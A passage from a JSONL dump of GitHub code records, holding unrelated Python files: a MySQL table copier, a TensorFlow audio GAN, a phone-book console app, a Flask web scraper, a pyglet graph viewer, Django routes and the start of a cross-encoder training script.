print(\"Name:\",part.partName)\n #print(\"RecursiveIterator:\",part.recurse())\n #print(f\"Getting elements of: {part.partName}\")\n notes = get_note_details(part.recurse())\n i+=1\n #part.show()\n\n\n#midipath = r\"TrainingData/Music(old)/AC_DC/Back_In_Black.1.mid\"\n\n# find_music_qualities(midipath)\n#midi_to_image(midipath, dest_path=\"ACDCTest\", verbose=True)\n","repo_name":"Connorvangraan/MusicGeneration","sub_path":"midi_to_image.py","file_name":"midi_to_image.py","file_ext":"py","file_size_in_byte":10161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1324167194","text":"import os\nimport time\nimport mysql.connector\n\n\ndef connect_to_databases():\n \"\"\" Connect to given databases. Return connections. \"\"\"\n connection1 = mysql.connector.connect(host=os.environ['HOST_1'],\n database=os.environ['DATABASE_1'],\n user=os.environ['USER_1'],\n password=os.environ['PASSWORD_1'])\n connection2 = mysql.connector.connect(host=os.environ['HOST_2'],\n database=os.environ['DATABASE_2'],\n user=os.environ['USER_2'],\n password=os.environ['PASSWORD_2'])\n return connection1, connection2\n\n\ndef extract_create_table_query(cursor):\n \"\"\"\n Connect to first database and return SQL CREATE TABLE query\n in order to use it while target database creation.\n \"\"\"\n create_table_query = \"\"\n show_create_table_query = \"\"\"SHOW CREATE TABLE employees.titles;\"\"\"\n cursor.execute(show_create_table_query)\n create_table_info = cursor.fetchall()\n for element in create_table_info[0][1:][0]:\n create_table_query += element\n return create_table_query\n\n\ndef disconnect_from_databases(connection1, connection2, cursor1, cursor2):\n \"\"\" Terminate connections with databases. \"\"\"\n if connection1.is_connected():\n cursor1.close()\n connection1.close()\n print(\"MySQL connection1 closed\")\n if connection2.is_connected():\n cursor2.close()\n connection2.close()\n print(\"MySQL connection2 closed\")\n\n\ndef get_records_from_database(cursor):\n \"\"\" Return table records from given database. \"\"\"\n show_table_query = \"\"\"SELECT * FROM employees.titles\"\"\"\n cursor.execute(show_table_query)\n return cursor.fetchall()\n\n\ndef insert_table_to_database(records, cursor, connection):\n \"\"\" Insert all records to target database. \"\"\"\n start_insert = time.time()\n query = \"\"\"INSERT INTO employees_copy.titles(emp_no, title, from_date, \n to_date) VALUES (%s, %s, %s, %s); \"\"\"\n params = [(record[0], record[1], record[2], record[3]) for record in records]\n cursor.executemany(query, params)\n connection.commit()\n end_insert = time.time()\n print(\"Insert time is {}sec\".format(end_insert - start_insert))\n\n\ndef copy_table_to_database(cursor1, cursor2, connection2):\n \"\"\" Copy table to target database. \"\"\"\n start_copy = time.time()\n create_table_query = extract_create_table_query(cursor1)\n cursor2.execute(\"\"\"{}\"\"\".format(create_table_query))\n records = get_records_from_database(cursor1)\n insert_table_to_database(records, cursor2, connection2)\n end_copy = time.time()\n print(\"Copy time is {}sec\".format(end_copy - start_copy))\n\n\ndef main():\n try:\n connection1, connection2 = connect_to_databases()\n cursor1 = connection1.cursor()\n cursor2 = connection2.cursor()\n copy_table_to_database(cursor1, cursor2, connection2)\n except mysql.connector.Error as error:\n print(\"Error: {}\".format(error))\n finally:\n disconnect_from_databases(connection1, connection2, cursor1, cursor2)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"kajtuszd/mysql-operations","sub_path":"code/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27974513676","text":"from tensorflow import keras\r\nimport tensorflow as tf\r\n\r\n# Needed for exporting to audio\r\nfrom tensorflow.python.ops.numpy_ops import np_config\r\nnp_config.enable_numpy_behavior()\r\n\r\n#https://www.tensorflow.org/tutorials/audio/simple_audio\r\ndataset = keras.utils.audio_dataset_from_directory(\r\n directory=\"audio\",\r\n batch_size=2,\r\n)\r\n\r\ndef squeeze(audio, labels):\r\n audio = tf.squeeze(audio, axis=-1)\r\n return audio, labels\r\n \r\n#dataset = dataset.map(squeeze, tf.data.AUTOTUNE)\r\n\r\n# The following gives us (32, 661500), meaning we have 32 audio files\r\n# per batch, and 661,500 samples per file.\r\n\r\nsample_rate = 44100\r\n\r\n#for example_audio, example_labels in dataset.take(1): \r\n# print(example_audio)\r\n# print(example_audio.shape)\r\n# print(example_audio.dtype)\r\n# print(example_audio[0])\r\n \r\n#for example_audio in dataset.take(1):\r\n \r\n# data = tf.audio.encode_wav(example_audio[0][0].reshape((sample_rate*15, 1)), sample_rate, name=None)\r\n# tf.io.write_file(f\"Generated/example_audio.wav\", data, name=None)\r\n \r\n#exit()\r\n\r\nfrom tensorflow.keras import layers\r\n\r\nlatent_dim = 128\r\n\r\nd_input = keras.Input(shape=(661500, 1))\r\n\r\n# Low frequency is aiming to capture signals as low as 20hz, so (1/20) * 44100 = 2205\r\nd_lowFrequency = layers.Conv1D(64, kernel_size=2205, strides=1, padding=\"same\", name=\"d_lowFrequency_1\")(d_input)\r\n# Mid frequency is aiming to capture signals as low as 500hz, so (1/500) * 44100 = ~88\r\nd_midFrequency = layers.Conv1D(128, kernel_size=88, strides=1, padding=\"same\", name=\"d_midFrequency_1\")(d_input)\r\n# High frequency is aiming to capture signals as low as 1000hz, so (1/500) * 44100 = ~44\r\nd_highFrequency = layers.Conv1D(128, kernel_size=44, strides=1, padding=\"same\", name=\"d_highFrequency_1\")(d_input)\r\n\r\n# Down from 661,500 to 1,323\r\nd_lowFrequency = layers.Conv1D(64, kernel_size=100, strides=50, padding=\"same\", name=\"d_lowFrequency_2\")(d_lowFrequency)\r\nd_lowFrequency = layers.BatchNormalization()(d_lowFrequency)\r\nd_lowFrequency = layers.LeakyReLU(alpha=0.2)(d_lowFrequency)\r\nd_lowFrequency = layers.Conv1D(64, kernel_size=25, strides=10, padding=\"same\", name=\"d_lowFrequency_3\")(d_lowFrequency)\r\nd_lowFrequency = layers.BatchNormalization()(d_lowFrequency)\r\nd_lowFrequency = layers.LeakyReLU(alpha=0.2)(d_lowFrequency)\r\n\r\nd_midFrequency = layers.Conv1D(128, kernel_size=50, strides=10, padding=\"same\", name=\"d_midFrequency_2\")(d_midFrequency)\r\nd_midFrequency = layers.BatchNormalization()(d_midFrequency)\r\nd_midFrequency = layers.LeakyReLU(alpha=0.2)(d_midFrequency)\r\nd_midFrequency = layers.Conv1D(128, kernel_size=25, strides=10, padding=\"same\", name=\"d_midFrequency_3\")(d_midFrequency)\r\nd_midFrequency = layers.BatchNormalization()(d_midFrequency)\r\nd_midFrequency = layers.LeakyReLU(alpha=0.2)(d_midFrequency)\r\nd_midFrequency = layers.Conv1D(128, kernel_size=10, strides=5, padding=\"same\", name=\"d_midFrequency_4\")(d_midFrequency)\r\nd_midFrequency = layers.BatchNormalization()(d_midFrequency)\r\nd_midFrequency = layers.LeakyReLU(alpha=0.2)(d_midFrequency)\r\n\r\nd_highFrequency = layers.Conv1D(128, kernel_size=50, strides=10, padding=\"same\", name=\"d_highFrequency_2\")(d_highFrequency)\r\nd_highFrequency = layers.BatchNormalization()(d_highFrequency)\r\nd_highFrequency = layers.LeakyReLU(alpha=0.2)(d_highFrequency)\r\nd_highFrequency = layers.Conv1D(128, kernel_size=25, strides=10, padding=\"same\", name=\"d_highFrequency_3\")(d_highFrequency)\r\nd_highFrequency = layers.BatchNormalization()(d_highFrequency)\r\nd_highFrequency = layers.LeakyReLU(alpha=0.2)(d_highFrequency)\r\nd_highFrequency = layers.Conv1D(128, kernel_size=10, strides=5, padding=\"same\", name=\"d_highFrequency_4\")(d_highFrequency)\r\nd_highFrequency = layers.BatchNormalization()(d_highFrequency)\r\nd_highFrequency = layers.LeakyReLU(alpha=0.2)(d_highFrequency)\r\n\r\nd_concatenate = layers.Concatenate()([d_lowFrequency, d_midFrequency, d_highFrequency])\r\n\r\nx = layers.BatchNormalization()(d_concatenate)\r\nx = layers.LeakyReLU(alpha=0.2)(x)\r\n\r\nx = layers.Conv1D(128, kernel_size=11, strides=9, padding=\"same\")(x)\r\nx = layers.BatchNormalization()(x)\r\nx = layers.LeakyReLU(alpha=0.2)(x)\r\n\r\nx = layers.Conv1D(128, kernel_size=9, strides=7, padding=\"same\")(x)\r\nx = layers.BatchNormalization()(x)\r\nx = layers.LeakyReLU(alpha=0.2)(x)\r\n\r\nx = layers.Flatten()(x)\r\nx = layers.Dropout(0.2)(x)\r\nd_output = layers.Dense(1, activation=\"sigmoid\")(x)\r\n\r\ndiscriminator = keras.Model(inputs=d_input, outputs=d_output, name=\"discriminator\")\r\n\r\nprint(discriminator.summary())\r\n\r\nlatent_dim = 128\r\n\r\ng_input = keras.Input(shape=(latent_dim,))\r\nx = layers.Dense(21 * 128)(g_input)\r\nx = layers.Reshape((21, 128))(x)\r\n\r\nx = layers.Conv1DTranspose(128, kernel_size=9, strides=7, padding=\"same\")(x)\r\nx = layers.BatchNormalization()(x)\r\nx = layers.LeakyReLU(alpha=0.2)(x)\r\n\r\nx = layers.Conv1DTranspose(128, kernel_size=11, strides=9, padding=\"same\")(x)\r\nx = layers.BatchNormalization()(x)\r\nx = layers.LeakyReLU(alpha=0.2)(x)\r\n\r\ng_lowFrequency = layers.Conv1DTranspose(64, kernel_size=25, strides=10, padding=\"same\", name=\"g_lowFrequency_1\")(x)\r\ng_lowFrequency = layers.BatchNormalization()(g_lowFrequency)\r\ng_lowFrequency = layers.LeakyReLU(alpha=0.2)(g_lowFrequency)\r\ng_lowFrequency = layers.Conv1DTranspose(64, kernel_size=100, strides=50, padding=\"same\", name=\"g_lowFrequency_2\")(g_lowFrequency)\r\ng_lowFrequency = layers.BatchNormalization()(g_lowFrequency)\r\ng_lowFrequency = layers.LeakyReLU(alpha=0.2)(g_lowFrequency)\r\n\r\ng_midFrequency = layers.Conv1DTranspose(128, kernel_size=10, strides=5, padding=\"same\", name=\"g_midFrequency_1\")(x)\r\ng_midFrequency = layers.BatchNormalization()(g_midFrequency)\r\ng_midFrequency = layers.LeakyReLU(alpha=0.2)(g_midFrequency)\r\ng_midFrequency = layers.Conv1DTranspose(128, kernel_size=25, strides=10, padding=\"same\", name=\"g_midFrequency_2\")(g_midFrequency)\r\ng_midFrequency = layers.BatchNormalization()(g_midFrequency)\r\ng_midFrequency = layers.LeakyReLU(alpha=0.2)(g_midFrequency)\r\ng_midFrequency = layers.Conv1DTranspose(128, kernel_size=50, strides=10, padding=\"same\", name=\"g_midFrequency_3\")(g_midFrequency)\r\ng_midFrequency = layers.BatchNormalization()(g_midFrequency)\r\ng_midFrequency = layers.LeakyReLU(alpha=0.2)(g_midFrequency)\r\n\r\ng_highFrequency = layers.Conv1DTranspose(128, kernel_size=10, strides=5, padding=\"same\", name=\"g_highFrequency_1\")(x)\r\ng_highFrequency = layers.BatchNormalization()(g_highFrequency)\r\ng_highFrequency = layers.LeakyReLU(alpha=0.2)(g_highFrequency)\r\ng_highFrequency = layers.Conv1DTranspose(128, kernel_size=25, strides=10, padding=\"same\", name=\"g_highFrequency_2\")(g_highFrequency)\r\ng_highFrequency = layers.BatchNormalization()(g_highFrequency)\r\ng_highFrequency = layers.LeakyReLU(alpha=0.2)(g_highFrequency)\r\ng_highFrequency = layers.Conv1DTranspose(128, kernel_size=50, strides=10, padding=\"same\", name=\"g_highFrequency_3\")(g_highFrequency)\r\ng_highFrequency = layers.BatchNormalization()(g_highFrequency)\r\ng_highFrequency = layers.LeakyReLU(alpha=0.2)(g_highFrequency)\r\n\r\ng_concatenate = layers.Concatenate()([g_lowFrequency, g_midFrequency, g_highFrequency])\r\n\r\ng_output = layers.Conv1D(1, kernel_size=5, padding=\"same\", activation=\"tanh\")(g_concatenate)\r\n\r\ngenerator = keras.Model(inputs=g_input, outputs=g_output, name=\"generator\")\r\n\r\nprint(generator.summary())\r\n\r\nimport tensorflow as tf\r\n\r\nclass GAN(keras.Model):\r\n def __init__(self, discriminator, generator, latent_dim):\r\n super().__init__()\r\n self.discriminator = discriminator\r\n self.generator = generator\r\n self.latent_dim = latent_dim\r\n self.d_loss_metric = keras.metrics.Mean(name=\"d_loss\")\r\n self.g_loss_metric = keras.metrics.Mean(name=\"g_loss\")\r\n\r\n def compile(self, d_optimizer, g_optimizer, loss_fn):\r\n super(GAN, self).compile()\r\n self.d_optimizer = d_optimizer\r\n self.g_optimizer = g_optimizer\r\n self.loss_fn = loss_fn\r\n\r\n @property\r\n def metric(self):\r\n return [self.d_loss_metric, self.g_loss_metric]\r\n\r\n def train_step(self, real_images):\r\n real_images = real_images[0]\r\n #print(real_images)\r\n #print(real_images[0])\r\n #print(real_images[0][0])\r\n batch_size = tf.shape(real_images)[0]\r\n random_latent_vectors = tf.random.normal(shape=(batch_size, self.latent_dim))\r\n generated_images = self.generator(random_latent_vectors)\r\n #print(\"Generated: \", generated_images[0])\r\n #print(\"Real: \", real_images[0])\r\n combined_images = tf.concat([generated_images, real_images], axis=0)\r\n labels = tf.concat(\r\n [tf.ones((batch_size, 1)), tf.zeros((batch_size, 1))],\r\n axis=0\r\n )\r\n labels += 0.05 * tf.random.uniform(tf.shape(labels))\r\n\r\n with tf.GradientTape() as tape:\r\n predictions = self.discriminator(combined_images)\r\n d_loss = self.loss_fn(labels, predictions)\r\n \r\n grads = tape.gradient(d_loss, self.discriminator.trainable_weights)\r\n self.d_optimizer.apply_gradients(\r\n zip(grads, self.discriminator.trainable_weights)\r\n )\r\n\r\n random_latent_vectors = tf.random.normal(shape=(batch_size, self.latent_dim))\r\n\r\n misleading_labels = tf.zeros((batch_size, 1))\r\n with tf.GradientTape() as tape:\r\n predictions = self.discriminator(self.generator(random_latent_vectors))\r\n g_loss = self.loss_fn(misleading_labels, predictions)\r\n \r\n grads = tape.gradient(g_loss, self.generator.trainable_weights)\r\n self.g_optimizer.apply_gradients(\r\n zip(grads, self.generator.trainable_weights)\r\n )\r\n\r\n self.d_loss_metric.update_state(d_loss)\r\n self.g_loss_metric.update_state(g_loss)\r\n return {\"d_loss\": self.d_loss_metric.result(),\r\n \"g_loss\": self.g_loss_metric.result()}\r\n \r\nclass GANMonitor(keras.callbacks.Callback):\r\n def __init__(self, num_img=3, latent_dim=128):\r\n self.num_img = num_img\r\n self.latent_dim = latent_dim\r\n\r\n def on_epoch_end(self, epoch, logs=None):\r\n random_latent_vectors = tf.random.normal(\r\n shape=(self.num_img, self.latent_dim))\r\n generated_audio = self.model.generator(random_latent_vectors)\r\n #generated_images *= 255\r\n generated_audio.numpy()\r\n\r\n if epoch % 5 == 0:\r\n for i in range(self.num_img):\r\n #img = keras.utils.array_to_img(generated_images[i])\r\n #img.save(f\"generated_img_{epoch:03d}_{i}.png\")\r\n \r\n # We need np_config.enable_numpy_behavior() for the following line\r\n data = tf.audio.encode_wav(generated_audio[0].reshape((sample_rate*15, 1)), sample_rate, name=None)\r\n tf.io.write_file(f\"Generated/generated_music_{epoch:03d}_{i}.wav\", data, name=None)\r\n\r\n #with open(f\"generated_music_{epoch:03d}_{i}.wav\", \"w\") as file:\r\n # file.write(data)\r\n \r\nepochs = 5000\r\n\r\ngan = GAN(discriminator=discriminator, generator=generator, latent_dim=latent_dim)\r\ngan.compile(\r\n #d_optimizer=keras.optimizers.Adam(learning_rate=0.00001),\r\n #g_optimizer=keras.optimizers.Adam(learning_rate=0.0003),\r\n d_optimizer=keras.optimizers.Adam(learning_rate=0.000007),\r\n g_optimizer=keras.optimizers.Adam(learning_rate=0.0004),\r\n loss_fn=keras.losses.BinaryCrossentropy(),\r\n)\r\n\r\ngan.fit(\r\n dataset, epochs=epochs,\r\n callbacks=[GANMonitor(num_img=10, latent_dim=latent_dim)]\r\n)","repo_name":"ewelborn/DnB","sub_path":"DnB.py","file_name":"DnB.py","file_ext":"py","file_size_in_byte":11412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26092097403","text":"location = PVector(0, 200) \nvelocity = PVector(1, 1)\n\ndef setup():\n size(400, 400)\n frameRate(45)\n rectMode(CENTER)\ndef draw():\n background(134)\n location.add(velocity)\n stroke(0)\n strokeWeight (10)\n fill(random(255), random(255), random(255)) # losowanie kolorów, to pójście na łątwiznę\n rect(location.x,location.y,120,120)\ndef mousePressed(): \n loop() #nie zakańczasię, gdy kwadrat dochodzi do brzegu\n","repo_name":"Jelonn/zadania","sub_path":"ZADANIE_kwadrat/ZADANIE_kwadrat.pyde","file_name":"ZADANIE_kwadrat.pyde","file_ext":"pyde","file_size_in_byte":441,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71778939986","text":"Telephone_book = {'Rahaf': '0546771330', 'Waleed': '0554258100', 'Sharefh': '0554943200'}\r\nsir_madam_name = input(\"Please enter your name : \")\r\n\r\ndef display_menue():\r\n\tprint(\"\\nHello , Good evening \" + sir_madam_name + \"\\n\")\r\n\tprint(\"**************\\tTelephone Book Menue\\t**************\\n\\n\")\r\n\tprint(\"1) Display Telephone Book\\n\"\r\n\t\t \"2) Display Number\\n\"\r\n\t\t \"3) Display Name\\n\"\r\n\t\t \"4) Add User\\n\"\r\n\t\t \"5) Done \\n\")\r\n\tchoice = input(\"please choose an number : \")\r\n\r\n\tif choice == \"1\":\r\n\t\tprint(\"\\n----------------------------------------------------\")\r\n\t\tdisplay_Telephone_book()\r\n\telif choice == \"2\":\r\n\t\tprint(\"\\n----------------------------------------------------\")\r\n\t\tdisplay_number()\r\n\telif choice == \"3\":\r\n\t\tprint(\"\\n----------------------------------------------------\")\r\n\t\tdisplay_name()\r\n\telif choice == \"4\":\r\n\t\tprint(\"\\n----------------------------------------------------\")\r\n\t\tadd_user()\r\n\telif choice == \"5\":\r\n\t\tprint(\"\\n----------------------------------------------------\")\r\n\t\tend_process()\r\n\telse:\r\n\t\tprint(\"This is invalid number\")\r\n\r\ndef display_menue_again():\r\n\tprint(\"----------------------------------------------------\\n\\n\")\r\n\tprint(\"**************\\tTelephone Book Menue\\t**************\\n\\n\")\r\n\tprint(\"1) Display Telephone Book\\n\"\r\n\t\t \"2) Display Number\\n\"\r\n\t\t \"3) Display Name\\n\"\r\n\t\t \"4) Add User\\n\"\r\n\t\t \"5) Done \\n\")\r\n\tchoice = input(\"please choose an number : \")\r\n\r\n\tif choice == \"1\":\r\n\t\tprint(\"\\n----------------------------------------------------\")\r\n\t\tdisplay_Telephone_book()\r\n\telif choice == \"2\":\r\n\t\tprint(\"\\n----------------------------------------------------\")\r\n\t\tdisplay_number()\r\n\telif choice == \"3\":\r\n\t\tprint(\"\\n----------------------------------------------------\")\r\n\t\tdisplay_name()\r\n\telif choice == \"4\":\r\n\t\tprint(\"\\n----------------------------------------------------\")\r\n\t\tadd_user()\r\n\telif choice == \"5\":\r\n\t\tprint(\"\\n----------------------------------------------------\")\r\n\t\tend_process()\r\n\telse:\r\n\t\tprint(\"This is invalid number\")\r\n\r\n\r\ndef display_Telephone_book():\r\n\tprint(Telephone_book)\r\n\tdisplay_menue_again()\r\n\r\ndef add_user():\r\n\tnumber_of_users = int(input(\"home many users you want to add : \"))\r\n\r\n\tfor x in range(number_of_users):\r\n\t\tname = input(\"Please enter your name : \") # key\r\n\t\tphone_Number = input(\"Please enter your phone number : \") # vlaue\r\n\t\tTelephone_book[name] = phone_Number\r\n\r\n\tprint(Telephone_book)\r\n\tdisplay_menue_again()\r\n\r\ndef display_number():\r\n\tname = input(\"please enter the name \")\r\n\tif name in Telephone_book:\r\n\t\tprint(Telephone_book[name])\r\n\r\n\r\n\telse:\r\n\t\tprint(\"Sorry, the name is not found \")\r\n\r\n\tdisplay_menue_again()\r\n\r\ndef display_name():\r\n\tphone_Number = input(\"please enter the phone number \")\r\n\tif phone_Number in Telephone_book:\r\n\t\tprint(Telephone_book.keys(phone_Number))\r\n\r\n\telse:\r\n\t\tprint(\"Sorry, the number is not found \")\r\n\r\n\tdisplay_menue_again()\r\n\r\n\r\ndef end_process():\r\n\tprint(\"Thank you for time ! \")\r\n\r\n\r\n\r\ndisplay_menue()\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"rahafwmaq/phone_book","sub_path":"app1.py","file_name":"app1.py","file_ext":"py","file_size_in_byte":2943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73492610385","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jul 20 08:24:43 2021\n\n@author: Aderoju Adeyemi\n\"\"\"\n\nclass Settings:\n\n\tdef __init__(self):\n\t\t\"\"\"Initialize the game's settings.\"\"\"\n\n\t\tself.screen_width = 1200\n\t\tself.screen_height = 800\n\t\tself.bg_color = (230, 230, 230)\n\t\t# Ship settings\n\t\tself.ship_speed = 1.5","repo_name":"rojuadeyemi/VS-Code","sub_path":"Python/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24045558853","text":"def no_clust(dataframe):\n\timport pandas as pd\n\t'''\n\tThis function will answers 4 questions about important metrics\n\tafter clustering mature peptides from genome of all known subtypes\n\t'''\n\t# Q1: How many clusters there are\n\tdf=pd.DataFrame(pd.crosstab(dataframe['cluster'],dataframe['accession_no']))\n\tprint('\\n 1. There are %i clusters' % df.shape[0])\n\treturn df.shape[0]\n\ndef size_clust(dataframe):\t\n\timport pandas as pd\n\t# Q2: How big is each cluster is? (number of protein in each cluster)\n\tno_prot_in_clust = pd.crosstab(dataframe['cluster'],\n dataframe['prot'],\n margins = False)\n\tprot = pd.DataFrame(no_prot_in_clust)\n\tprot['sum']=no_prot_in_clust.sum(axis=1)\n\tprint('\\n 2. Number of protein in each cluster:')\n\t#print(prot['sum'])\n\treturn prot['sum']\n\ndef clust_icl_all_prot(dataframe):\t\n\timport pandas as pd\n\t# Q3: How many clusters have exactly one protein from every genome\n\tclust = pd.crosstab(dataframe['accession_no'],\n dataframe['cluster'],\n margins = False)\n\ti = sum(clust.sum(axis=0)==clust.shape[0])\n\tprint(\"\\n 3. There are %i clusters have exactly one protein from every genome\" % i)\n\tprint(clust)\n\ndef prot_in_multi_clust(dataframe):\n\timport pandas as pd\n\t# Q4: How many proteins are in multiple cluster?\n\t# create new column for checking prot from genome in cluster\n\tdataframe['unique']=dataframe['accession_no']+'_'+dataframe['prot']\n\tunique = pd.crosstab(dataframe['unique'],\n dataframe['cluster'],\n margins = False)\n\tmulti = pd.DataFrame(unique)\n\tmulti['sum'] = unique.sum(axis=1)\n\tprint('\\n 4. %i proteins are in multiple cluster' % sum(multi['sum']>1))\n\treturn sum(multi['sum']>1)","repo_name":"maingoc303/Graph_Genome","sub_path":"metric_functions.py","file_name":"metric_functions.py","file_ext":"py","file_size_in_byte":1780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38796461542","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom flask import Flask, request\n\napp = Flask(__name__)\n\ndef scrape_website(url):\n response = requests.get(url)\n soup = BeautifulSoup(response.content, \"html.parser\")\n\n # Scrape articles\n articles = soup.find_all(\"article\")\n article_data = [article.get_text() for article in articles]\n\n # Scrape links\n links = soup.find_all(\"a\")\n link_data = [link[\"href\"] for link in links]\n\n # Scrape products and prices (example)\n products = soup.find_all(\"div\", class_=\"product\")\n product_data = []\n for product in products:\n name = product.find(\"h2\").text.strip()\n price = product.find(\"span\", class_=\"price\").text.strip()\n product_data.append({\"name\": name, \"price\": price})\n\n # Return scraped data\n return {\n \"articles\": article_data,\n \"links\": link_data,\n \"products\": product_data\n }\n\n@app.route(\"/\", methods=[\"GET\", \"POST\"])\ndef scrape_web_app():\n if request.method == \"POST\":\n url = request.form[\"url\"]\n scraped_data = scrape_website(url)\n\n # Save data to a file\n with open(\"scraped_data.txt\", \"w\") as file:\n file.write(str(scraped_data))\n\n return \"Scraping completed. Data saved to scraped_data.txt file.\"\n\n # Render the HTML form for entering the URL\n return \"\"\"\n \n \n \n \n \n \"\"\"\n\nif __name__ == \"__main__\":\n app.run()","repo_name":"Shahnawaz9999/letlearnGit","sub_path":"simple_web_scrapping_tool.py","file_name":"simple_web_scrapping_tool.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2318038659","text":"import pyglet\nimport pyrr\nfrom pyglet.gl import *\nfrom pyglet.window import mouse\n\nimport core\nimport database\n\n\nclass OrthoCamera:\n def __init__(self):\n self.pos = pyrr.Vector3([0.0, 0.0, 0.0])\n self.zoom = 1.0\n self.width = 1.0\n self.height = 1.0\n\n def set_transform(self):\n transform = pyrr.Matrix44(\n [\n [self.zoom * 2 / self.width, 0, 0, 0],\n [0, self.zoom * 2 / self.height, 0, 0],\n [0, 0, 0, 0],\n [-1 + 2 * self.pos[0] / self.width, -1 + 2 * self.pos[1] / self.height, 0, 1]\n ]\n )\n tmp = transform.flatten()\n glLoadMatrixf((GLfloat * len(tmp))(*tmp))\n\n\ndef draw_rect(top_left, bottom_right):\n glBegin(GL_TRIANGLES)\n\n glVertex2f(top_left[0], top_left[1])\n glVertex2f(top_left[0], bottom_right[1])\n glVertex2f(bottom_right[0], bottom_right[1])\n\n glVertex2f(top_left[0], top_left[1])\n glVertex2f(bottom_right[0], bottom_right[1])\n glVertex2f(bottom_right[0], top_left[1])\n\n glEnd()\n\n\nclass GraphRenderer:\n def __init__(self):\n self._camera = OrthoCamera()\n\n def draw_node(self):\n glColor3f(1.0, 1.0, 1.0)\n draw_rect([20, 120], [60, 100])\n\n def draw(self):\n glPushMatrix()\n self._camera.set_transform()\n\n label = pyglet.text.Label(\"Hello world\")\n label.draw()\n\n self.draw_node()\n\n glPopMatrix()\n\n def translate_view(self, delta):\n self._camera.pos += delta\n\n def zoom_view(self, delta):\n self._camera.zoom += delta[0] / 40\n self._camera.zoom = min(2.0, self._camera.zoom)\n self._camera.zoom = max(0.5, self._camera.zoom)\n\n def set_screen_size(self, width, height):\n self._camera.width = width\n self._camera.height = height\n\n\nclass LavenderWindow(pyglet.window.Window):\n def __init__(self, drawable, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self._drawable = drawable\n\n def on_draw(self):\n self._drawable.set_screen_size(self.width, self.height)\n glClear(GL_COLOR_BUFFER_BIT)\n glMatrixMode(GL_PROJECTION)\n glLoadIdentity()\n self._drawable.draw()\n\n def on_mouse_drag(self, x, y, dx, dy, buttons, modifiers):\n delta = pyrr.Vector3([dx, dy, 0])\n\n if buttons & pyglet.window.mouse.MIDDLE:\n self._drawable.translate_view(delta)\n if buttons & pyglet.window.mouse.RIGHT:\n self._drawable.zoom_view(delta)\n\n\ndef launch():\n core.init()\n module_store = core.get_plugin_store()\n\n database.init(module_store)\n\n graph_renderer = GraphRenderer()\n window = LavenderWindow(graph_renderer, width=1000, height=600)\n\n pyglet.app.run()\n\n\nif __name__ == \"__main__\":\n launch()\n","repo_name":"lokehoke/lavender","sub_path":"python/launch.py","file_name":"launch.py","file_ext":"py","file_size_in_byte":2781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18183604861","text":"from django.urls import include, path\nfrom .views import *\n\n\napp_name = \"libraryapp\"\n\n#the name makes it so that you can just reference a path.\n#kind of like a variable name.\n#decoupling--don't have to hard code route in other files.\n#so when you change the name of a route, don't have to change the route path wherever it's referenced.\n\nurlpatterns = [\n path('', home, name='home'),\n path('books/', book_list, name='books'),\n #already built into Python, don't have to build them, just using themn\n path('accounts/', include('django.contrib.auth.urls')),\n\n path('book/form', book_form, name='book_form'),\n path('books//', book_details, name='book'),\n path('books//form/', book_edit_form, name='book_edit_form'),\n\n path('librarians/', list_librarians, name='librarians'),\n path('librarians//', librarian_details, name='librarian'),\n\n path('libraries/form', library_form, name='library_form'),\n path('libraries/', list_libraries, name='libraries'),\n path('libraries//', library_details, name='library'),\n\n\n path('logout/', logout_user, name='logout'), \n]","repo_name":"erinepolley/python-book3-library-app","sub_path":"libraryproject/libraryapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39095065133","text":"\"\"\"\nThis examples show how to train a Cross-Encoder for the MS Marco dataset (https://github.com/microsoft/MSMARCO-Passage-Ranking).\n\nThe query and the passage are passed simoultanously to a Transformer network. The network then returns\na score between 0 and 1 how relevant the passage is for a given query.\n\nThe resulting Cross-Encoder can then be used for passage re-ranking: You retrieve for example 100 passages\nfor a given query, for example with ElasticSearch, and pass the query+retrieved_passage to the CrossEncoder\nfor scoring. You sort the results then according to the output of the CrossEncoder.\n\nThis gives a significant boost compared to out-of-the-box ElasticSearch / BM25 ranking.\n\nRunning this script:\npython train_cross-encoder.py\n\"\"\"\nfrom torch.utils.data import DataLoader\nfrom sentence_transformers import LoggingHandler, util\nfrom sentence_transformers.cross_encoder import CrossEncoder\nfrom sentence_transformers.cross_encoder.evaluation import CERerankingEvaluator\nfrom sentence_transformers import InputExample\nimport logging\nfrom datetime import datetime\nimport gzip\nimport os\nimport tarfile\nimport tqdm\n\n#### Just some code to print debug information to stdout\nlogging.basicConfig(format='%(asctime)s - %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S',\n level=logging.INFO,\n handlers=[LoggingHandler()])\n#### /print debug information to stdout\n\n\n#First, we define the transformer model we want to fine-tune\nmodel_name = 'distilroberta-base'\ntrain_batch_size = 32\nnum_epochs = 1\nmodel_save_path = 'output/training_ms-marco_cross-encoder-'+model_name.replace(\"/\", \"-\")+'-'+datetime.now().strftime(\"%Y-%m-%d_%H-%M-%S\")\n\n\n# We train the network with as a binary label task\n# Given [query, passage] is the label 0 = irrelevant or 1 = relevant?\n# We use a positive-to-negative ratio: For 